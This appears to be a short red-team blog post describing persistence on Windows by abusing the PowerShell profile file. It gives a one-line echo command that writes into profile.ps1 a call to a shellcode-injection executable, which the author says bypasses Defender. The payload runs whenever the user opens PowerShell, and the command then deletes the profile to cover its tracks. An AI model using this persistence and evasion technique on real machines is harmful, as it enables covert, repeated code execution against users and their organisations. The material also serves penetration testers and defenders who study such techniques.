Windows PowerShell Persistence
Windows users have in their Documents directory (usually) a folder named “WindowsPowerShell”. PowerShell allows users to customize their PowerShell environment through the use of profile files.
This file can be abused by using it as a wrapper for other commands to execute as the user context opening the PowerShell terminal. (ie - low privilege user, low privilege outcome; UAC admin user, admin outcome). Note that execution of the included command will stop PowerShell from loading, and may prevent legitimate business functions from occurring.
For the below example we are using an AES shellcode injection technique as I am also bypassing Defender, however most commands can be used (again, depending on user context). My executable is named applesauce.exe, which loads an encoded shellcode, decodes and executes it.
echo "'C:\users\jwhel\Desktop\Projects\Injections\applesauce.exe test.bin_enc'; del C:\Users\jwhel\Documents\WindowsPowerShell\profile.ps1" > profile.ps1
Now that the command is echoed into the profile.ps1 file, we can wait for a valid user to start PowerShell, which executes the payload command. Again, this technique can essentially disable PowerShell for the user, so use with caution (in the above example I delete the profile.ps1 file after I terminate the shell access. Note that you shouldn’t use the profile.ps1 file if the user actually uses this feature).